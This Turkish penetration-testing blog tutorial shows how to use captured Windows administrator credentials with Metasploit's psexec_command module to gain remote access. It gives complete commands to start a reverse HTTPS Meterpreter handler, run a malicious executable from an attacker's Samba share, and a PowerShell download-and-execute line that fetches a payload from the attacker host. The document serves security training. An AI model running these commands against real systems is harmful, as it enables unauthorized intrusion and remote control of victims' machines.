MSF psexec_command Auxiliary Modülü ve Elde Edilen Kimlik Bilgileri ile Windows Bir Bilgisayarlara Meterpreter Bağlantısı Elde Edilmesi

0
497
views
Sızma testleri sırasında, bir şekilde elde edilen kimlik bilgileri (kullanıcı adı ve parola / parola özeti) kullanılarak Windows bilgisayarlara erişim sağlanmaya çalışılır. Bu yazıda erişim bilgileri (IP, kullanıcı adı, parolası veya parola özeti) elde edilmiş bir Windows bilgisayara MSF psexec_command auxiliary modülü ile Meterpreter bağlantısı gerçekleştirilecektir.

Pentist: Sızma Testleri ve Bilgi Güvenliği Danışmanlık Hizmetleri

Bu yazıda kullanılacak Kali bilgisayarın IP adresi 192.168.4.32, kurbana ait Windows 7 makinenin IP adresi ise 192.168.4.17 olduğu ve Windows 7 bilgisayarda yerel yönetici olan hesabın kullanıcı adının “Yonetici”, parolasının ise “Aa123456” olarak tespit edildiğini varsayalım.

Meterpreter komut satırı elde etmek için ve saldırgana ait Kali bilgisayara ters HTTPS Meterpreter bağlantısı kuracak olan zararlı bir uygulama dosyasının oluşturulduğunu varsayalım. Bu uygulama MSF psexec_command modülüne parametre olarak verilecek ve çalışması sağlanacaktır.

obtaining-meterpreter-session-by-using-obtained-authentication-informations-via-msf-psexec-command-auxiliary-module-01

Kali sunucuda SAMBA sunucu uygulamasının yüklü olduğunu varsayalım. Kali bilgisayarda, “paylasim$” adlı gizli bir paylaşım dizinine herkes (everyone) için okuma ve yazma izni verilmiş olsun.

Oluşturulan uygulamanın gerçekleştireceği ters HTTPS Meterpreter bağlantısını dinleyecek olan MSF multi-handler istismar modülü aşağıdaki gibi ayarlanabilir.

use exploit/multi/handler
show options
set PAYLOAD windows/meterpreter/reverse_https
set ExitOnSession false
set LHOST 192.168.4.32
set LPORT 443
exploit -j

obtaining-meterpreter-session-by-using-obtained-authentication-informations-via-msf-psexec-command-auxiliary-module-02

MSF psexec_auxiliary auxiliary modülünün genel seçenekleri aşağıdaki gibi listelenebilir.

use auxiliary/admin/smb/psexec_command
show options

obtaining-meterpreter-session-by-using-obtained-authentication-informations-via-msf-psexec-command-auxiliary-module-03

Windows bilgisayarda yerel yönetici haklarına sahip olan ve kimlik bilgileri elde edilen kullanıcı hakları ile Kali bilgisayarın paylaşımındaki zararlı uygulamanın MSF psexec_command auxiliary modülü ile çalıştırılması aşağıdaki gibi ayarlanabilir:

set COMMAND start \\192.168.4.32\paylasim$\Zararli1.exe
set RHOSTS 192.168.4.17
set SMBUser Yonetici
set SMBPass Aa123456

obtaining-meterpreter-session-by-using-obtained-authentication-informations-via-msf-psexec-command-auxiliary-module-04

İpucu: Parolanın açık hali yerine, parola özeti de verilebilir.

Not: COMMAND seçeneğine, parametre olarak “cmd” verilirse Windows komut satırı elde edilir.

Not: COMMAND seçeneğine Powershell komutu da verilerek Web paylaşımındaki bir zararlı dosya da çalıştırılabilir.

set COMMAND powershell -Exec Bypass -NoL -NoProfile -Command IEX (New-Object Net.WebClient).DownloadString(\’http://192.168.4.32/ZararliDosya.exe\’)

 

Modül seçenekleri ayarlandıktan sonra, modül çalıştırılır ve Kali bilgisayarın SAMBA paylaşımındaki dosyanın çalıştırılması sağlanır.

exploit

obtaining-meterpreter-session-by-using-obtained-authentication-informations-via-msf-psexec-command-auxiliary-module-05

Böylece, MSF multi-handler istismar modülü üzerinde gelen talep yakalanmıştır.

sessions -i 1
getuid

obtaining-meterpreter-session-by-using-obtained-authentication-informations-via-msf-psexec-command-auxiliary-module-06

İpucu: Zararlı yazılım, herkesin erişim sağlayabileceği bir sunucuya (web sunucusu, dosya sunucusu gibi), saldırgana ait Windows paylaşımına veya Linux SAMBA paylaşımına (192.168.4.32) da konulabilir.

Pentist: Sızma Testleri ve Bilgi Güvenliği Danışmanlık Hizmetleri

CEVAP VER

Yorumunuzu giriniz
İsminizi giriniz

Bu site, istenmeyenleri azaltmak için Akismet kullanıyor. Yorum verilerinizin nasıl işlendiği hakkında daha fazla bilgi edinin.